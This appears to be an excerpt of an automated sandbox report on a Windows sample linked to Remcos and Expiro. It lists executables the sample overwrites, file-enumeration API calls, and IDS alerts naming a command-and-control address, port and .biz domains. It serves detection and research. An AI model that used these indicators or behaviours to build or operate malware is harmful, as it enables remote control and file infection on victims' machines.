              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\snmptrap.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\Spectrum.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\Locator.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\7-Zip\7z.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\AppVClient.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\SysWOW64\perfhost.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\7-Zip\7zG.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\msiexec.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\VSSVC.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\wbengine.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\SearchIndexer.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\TieringEngineService.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\AgentService.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\FXSSVC.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\sppsvc.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\SensorDataService.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\msdtc.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00452492
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00442886
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_004788BD
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,1_2_004339B6
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,1_2_0045CAFA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00431A86
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,1_2_0044BD27
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0045DE8F FindFirstFileW,FindClose,1_2_0045DE8F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0044BF8B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00452492
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00442886
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004788BD
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,3_2_004339B6
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,3_2_0045CAFA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00431A86
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,3_2_0044BD27
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0045DE8F FindFirstFileW,FindClose,3_2_0045DE8F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0044BF8B
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\

              Networking

              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:63580 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49733 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:50853 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49774 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49769 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49766 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49739 -> 172.234.222.143:80
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49736
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49736
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49745
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49745
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49804 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49761 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49744 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49790
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49730 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49752 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49762 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49790
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:57533 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.4:49835
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49771 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49783 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.4:49835
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49845 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49772 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49789
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49789
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:49249 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.4:49828
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.4:49828
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49883
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49883
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49823 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49912 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49933 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.4:49872
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.4:49872
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49758 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49871 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49956 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.213.104.86:80 -> 192.168.2.4:49966
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49891 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49764 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.213.104.86:80 -> 192.168.2.4:49966
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49998 -> 18.208.156.248:80
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.4:49963
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49978 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.4:49963
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49997 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49765 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50037 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49767 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50059 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50016 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50077 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.4:50123
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50136 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:60155 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.4:50123
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50096 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50157 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50168 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50175 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50181 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50192 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50198 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50201 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50148 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50209 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50187 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.4:53939 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50218 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:50235 -> 18.208.156.248:80
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50143 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.4:59049 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50239 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.4:49265 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:55684 -> 1.1.1.1:53
